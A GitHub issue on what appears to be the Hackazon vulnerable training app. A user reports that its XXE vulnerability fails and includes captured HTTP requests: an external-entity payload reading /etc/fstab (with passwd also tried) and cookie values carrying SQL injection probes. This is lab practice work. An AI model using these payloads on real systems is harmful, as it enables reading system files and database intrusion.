This repository has been archived by the owner on May 18, 2021. It is now read-only.
Issues with XXE #25
Comments
# for free
to subscribe to this conversation on GitHub.
Already have an account?
#.
{{ message }}
XXE vulnerabilities seem not to be function.
I have verified that in XXE is enabled in the vulnerabilities.md file, I have also logged in to the admin page and ensured that there are pages with the XXE vulnerability was enabled. I turned it on every location that I could, just in case. I verified the PHP files in the config location to ensure the the XXE was set to true for the location I was needing. I enabled XXE for the Cart/View area.
I setup BURP to intercept the HTTP GET requests, and I capture the code below
---ORGINAL CODE---
GET /success.txt HTTP/1.1
Host: 192.168.198.145
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.198.145/cart/view
Cookie: visited_products=%2C208%2C101%2C18%2C188%2C1+or+1%3D1%2C1%3D1%2C64%2C1%2C72%2C101and+1%3D1%2C81%2C76%2C78%2C163%2C21%2C16%2C; PHPSESSID=9s2mrcem0stgqk0h9c0tvtenf1
---END OF CODE---
I modified the code to have the XML example code in the vulnerability
---MODIFIED CODE---
GET /success.txt HTTP/1.1
Host: 192.168.198.145
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml
Referer: http://192.168.198.145/cart/view
Cookie: visited_products=%2C208%2C101%2C18%2C188%2C1+or+1%3D1%2C1%3D1%2C64%2C1%2C72%2C101and+1%3D1%2C81%2C76%2C78%2C163%2C21%2C16%2C; PHPSESSID=9s2mrcem0stgqk0h9c0tvtenf1
<'?xml version="1.0" encoding="utf-8"?>
<'!DOCTYPE roottag [<'!ENTITY goodies SYSTEM "file:///etc/fstab">]>
<'roottag>&goodies;
---END OF CODE---
NOTE: I added ' at the start of each line to allow the code to display correctly in the note. In the real example, the ' was removed.
I have also modified the goodies to see if the PASSWD file would display.
I only get a HTML 400 return error.
I have clearing the cache, I have tried doing this is a VM with no other content, I ensure that firefox was updated.
Has anyone tested and/or seen XXE vulnerabilities function with hackazon?
The text was updated successfully, but these errors were encountered: